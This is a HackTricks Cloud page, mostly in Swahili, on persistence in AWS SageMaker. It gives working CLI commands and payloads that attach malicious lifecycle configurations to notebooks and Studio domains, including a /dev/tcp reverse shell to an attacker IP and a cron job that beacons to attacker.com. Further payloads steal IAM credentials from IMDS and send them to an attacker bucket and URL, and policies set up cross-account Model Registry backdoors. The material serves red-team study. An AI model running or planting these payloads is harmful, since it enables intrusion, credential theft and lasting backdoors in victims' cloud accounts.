HackTricks CloudAWS - SageMaker Uendelevu
Reading time: 7 minutes
tip
Jifunze na fanya mazoezi ya AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: 
HackTricks Training GCP Red Team Expert (GRTE)
Jifunze na fanya mazoezi ya Azure Hacking: 
HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Angalia mpango wa usajili!
- Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
- Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.
Muhtasari wa Mbinu za Uendelevu
Sehemu hii inaelezea njia za kupata uendelevu katika SageMaker kwa kutumia vibaya Lifecycle Configurations (LCCs), ikijumuisha reverse shells, cron jobs, credential theft via IMDS, na SSH backdoors. Scripts hizi zinaendesha kwa IAM role ya instance na zinaweza kudumu hata baada ya kuanzishwa upya. Mbinu nyingi zinahitaji outbound network access, lakini matumizi ya services kwenye AWS control plane bado yanaweza kuruhusu mafanikio ikiwa mazingira yako yako katika mode ya 'VPC-only'.
tip
Note: SageMaker notebook instances ni kimsingi EC2 instances zinazosimamiwa zilizosanifiwa hasa kwa ajili ya kazi za machine learning.
Ruhusa Zinazohitajika
- Notebook Instances:
sagemaker:CreateNotebookInstanceLifecycleConfig
sagemaker:UpdateNotebookInstanceLifecycleConfig
sagemaker:CreateNotebookInstance
sagemaker:UpdateNotebookInstance
- Programu za Studio:
sagemaker:CreateStudioLifecycleConfig
sagemaker:UpdateStudioLifecycleConfig
sagemaker:UpdateUserProfile
sagemaker:UpdateSpace
sagemaker:UpdateDomain
Weka Lifecycle Configuration kwenye Notebook Instances
Mifano ya AWS CLI Amri:
# Create Lifecycle Configuration*
aws sagemaker create-notebook-instance-lifecycle-config \
--notebook-instance-lifecycle-config-name attacker-lcc \
--on-start Content=$(base64 -w0 reverse_shell.sh)
# Attach Lifecycle Configuration to Notebook Instance*
aws sagemaker update-notebook-instance \
--notebook-instance-name victim-instance \
--lifecycle-config-name attacker-lcc
Weka Lifecycle Configuration kwenye SageMaker Studio
Lifecycle Configurations zinaweza kuambatishwa katika viwango mbalimbali na kwa aina tofauti za app ndani ya SageMaker Studio.
Kiwango cha Domain cha Studio (Watumiaji Wote)
# Create Studio Lifecycle Configuration*
aws sagemaker create-studio-lifecycle-config \
--studio-lifecycle-config-name attacker-studio-lcc \
--studio-lifecycle-config-app-type JupyterServer \
--studio-lifecycle-config-content $(base64 -w0 reverse_shell.sh)
# Apply LCC to entire Studio Domain*
aws sagemaker update-domain --domain-id <DOMAIN_ID> --default-user-settings '{
"JupyterServerAppSettings": {
"DefaultResourceSpec": {"LifecycleConfigArn": "<LCC_ARN>"}
}
}'
Studio Space Level (Nafasi za Binafsi au Ziloshirikishwa)
# Update SageMaker Studio Space to attach LCC*
aws sagemaker update-space --domain-id <DOMAIN_ID> --space-name <SPACE_NAME> --space-settings '{
"JupyterServerAppSettings": {
"DefaultResourceSpec": {"LifecycleConfigArn": "<LCC_ARN>"}
}
}'
Aina za Mipangilio za Lifecycle za Studio Application
Mipangilio ya lifecycle zinaweza kutumika mahsusi kwa aina tofauti za programu za SageMaker Studio:
- JupyterServer: Hukimbia scripts wakati wa kuanzishwa kwa server ya Jupyter; bora kwa mbinu za persistence kama reverse shells na cron jobs.
- KernelGateway: Hutekelezwa wakati app ya kernel gateway inapoanzishwa; inafaa kwa usanidi wa awali au ufikiaji wa kudumu.
- CodeEditor: Inatumika kwenye Code Editor (Code-OSS), ikiruhusu scripts zinazotekelezwa wakati vikao vya kuanza kuhariri code.
Amri ya Mfano kwa Kila Aina:
JupyterServer
aws sagemaker create-studio-lifecycle-config \
--studio-lifecycle-config-name attacker-jupyter-lcc \
--studio-lifecycle-config-app-type JupyterServer \
--studio-lifecycle-config-content $(base64 -w0 reverse_shell.sh)
KernelGateway
aws sagemaker create-studio-lifecycle-config \
--studio-lifecycle-config-name attacker-kernelgateway-lcc \
--studio-lifecycle-config-app-type KernelGateway \
--studio-lifecycle-config-content $(base64 -w0 kernel_persist.sh)
Mhariri wa Msimbo
aws sagemaker create-studio-lifecycle-config \
--studio-lifecycle-config-name attacker-codeeditor-lcc \
--studio-lifecycle-config-app-type CodeEditor \
--studio-lifecycle-config-content $(base64 -w0 editor_persist.sh)
Taarifa Muhimu:
- Kutumia LCCs katika ngazi ya domain au space kunaathiri watumiaji wote au applications ndani ya wigo.
- Inahitaji ruhusa za juu (sagemaker:UpdateDomain, sagemaker:UpdateSpace) na kwa kawaida ni rahisi kutekelezwa kwenye space kuliko ngazi ya domain.
- Udhibiti wa ngazi ya mtandao (mfano, strict egress filtering) unaweza kuzuia reverse shells zinazofanikiwa au data exfiltration.
Reverse Shell kupitia Lifecycle Configuration
SageMaker Lifecycle Configurations (LCCs) zinaendesha script maalum wakati notebook instances zinapoanza. Mshambuliaji mwenye ruhusa anaweza kuanzisha reverse shell ya kudumu.
Payload Example:
#!/bin/bash
ATTACKER_IP="<ATTACKER_IP>"
ATTACKER_PORT="<ATTACKER_PORT>"
nohup bash -i >& /dev/tcp/$ATTACKER_IP/$ATTACKER_PORT 0>&1 &
Cron Job Persistence kupitia Lifecycle Configuration
Mshambuliaji anaweza kuingiza cron jobs kupitia LCC scripts, kuhakikisha utekelezaji wa mara kwa mara wa malicious scripts au commands, na hivyo kuwezesha persistence kwa siri.
Payload Example:
#!/bin/bash
PAYLOAD_PATH="/home/ec2-user/SageMaker/.local_tasks/persist.py"
CRON_CMD="/usr/bin/python3 $PAYLOAD_PATH"
CRON_JOB="*/30 * * * * $CRON_CMD"
mkdir -p /home/ec2-user/SageMaker/.local_tasks
echo 'import os; os.system("curl -X POST http://attacker.com/beacon")' > $PAYLOAD_PATH
chmod +x $PAYLOAD_PATH
(crontab -u ec2-user -l 2>/dev/null | grep -Fq "$CRON_CMD") || (crontab -u ec2-user -l 2>/dev/null; echo "$CRON_JOB") | crontab -u ec2-user -
Uondoaji wa credentials kupitia IMDS (v1 & v2)
Mipangilio ya lifecycle inaweza kuuliza Instance Metadata Service (IMDS) ili kupata IAM credentials na kuzipeleka kwa mahali linalodhibitiwa na mshambuliaji.
Payload Example:
#!/bin/bash
ATTACKER_BUCKET="s3://attacker-controlled-bucket"
TOKEN=$(curl -X PUT "http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600")
ROLE_NAME=$(curl -s -H "X-aws-ec2-metadata-token: $TOKEN" http://169.254.169.254/latest/meta-data/iam/security-credentials/)
curl -s -H "X-aws-ec2-metadata-token: $TOKEN" http://169.254.169.254/latest/meta-data/iam/security-credentials/$ROLE_NAME > /tmp/creds.json
# Exfiltrate via S3*
aws s3 cp /tmp/creds.json $ATTACKER_BUCKET/$(hostname)-creds.json
# Alternatively, exfiltrate via HTTP POST*
curl -X POST -F "file=@/tmp/creds.json" http://attacker.com/upload
Uendelevu kupitia sera ya rasilimali ya Model Registry (PutModelPackageGroupPolicy)
Tumia vibaya sera iliyotegemezwa rasilimali kwenye SageMaker Model Package Group ili kumpa mhusika wa nje haki za kuvuka akaunti (mfano, CreateModelPackage/Describe/List). Hii huunda mlango wa nyuma wa kudumu unaoruhusu kusukuma matoleo ya modeli zilizochafuka au kusoma metadata/viambatisho vya modeli hata kama mtumiaji/role wa IAM wa mshambuliaji kwenye akaunti ya mwathiriwa amefutwa.
Ruhusa zinazohitajika
- sagemaker:CreateModelPackageGroup
- sagemaker:PutModelPackageGroupPolicy
- sagemaker:GetModelPackageGroupPolicy
Hatua (us-east-1)
# 1) Create a Model Package Group
REGION=${REGION:-us-east-1}
MPG=atk-mpg-$(date +%s)
aws sagemaker create-model-package-group \
--region "$REGION" \
--model-package-group-name "$MPG" \
--model-package-group-description "Test backdoor"
# 2) Craft a cross-account resource policy (replace 111122223333 with attacker account)
cat > /tmp/mpg-policy.json <<JSON
{
"Version": "2012-10-17",
"Statement": [
{
"Sid": "AllowCrossAccountCreateDescribeList",
"Effect": "Allow",
"Principal": {"AWS": ["arn:aws:iam::111122223333:root"]},
"Action": [
"sagemaker:CreateModelPackage",
"sagemaker:DescribeModelPackage",
"sagemaker:DescribeModelPackageGroup",
"sagemaker:ListModelPackages"
],
"Resource": [
"arn:aws:sagemaker:${REGION}:<VICTIM_ACCOUNT_ID>:model-package-group/${MPG}",
"arn:aws:sagemaker:${REGION}:<VICTIM_ACCOUNT_ID>:model-package/${MPG}/*"
]
}
]
}
JSON
# 3) Attach the policy to the group
aws sagemaker put-model-package-group-policy \
--region "$REGION" \
--model-package-group-name "$MPG" \
--resource-policy "$(jq -c . /tmp/mpg-policy.json)"
# 4) Retrieve the policy (evidence)
aws sagemaker get-model-package-group-policy \
--region "$REGION" \
--model-package-group-name "$MPG" \
--query ResourcePolicy --output text
Vidokezo
- Kwa backdoor halisi ya miongoni mwa akaunti, weka Resource kwa specific group ARN na tumia the attacker’s AWS account ID katika Principal.
- Kwa utekelezaji kuanzia hadi mwisho miongoni mwa akaunti au kusoma artifact, linganisha ruhusa za S3/ECR/KMS na akaunti ya mshambuliaji.
Athari
- Udhibiti wa kudumu miongoni mwa akaunti wa kundi la Model Registry: mshambuliaji anaweza kuchapisha matoleo ya model yenye madhara au kuorodhesha/kusoma metadata ya model hata baada ya entiti zao za IAM kuondolewa kwenye akaunti ya mwathiriwa.
Canvas miongoni mwa akaunti model registry backdoor (UpdateUserProfile.ModelRegisterSettings)
Tumia vibaya SageMaker Canvas user settings ili kimya-kimya kupangia tena (redirect) model registry writes kwa akaunti inayodhibitiwa na mshambuliaji kwa kuwezesha ModelRegisterSettings na kuelekeza CrossAccountModelRegisterRoleArn kwa role ya mshambuliaji katika akaunti nyingine.
Ruhusa zinazohitajika
- sagemaker:UpdateUserProfile on the target UserProfile
- Optional: sagemaker:CreateUserProfile on a Domain you control
tip
Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Angalia mpango wa usajili!
- Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
- Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.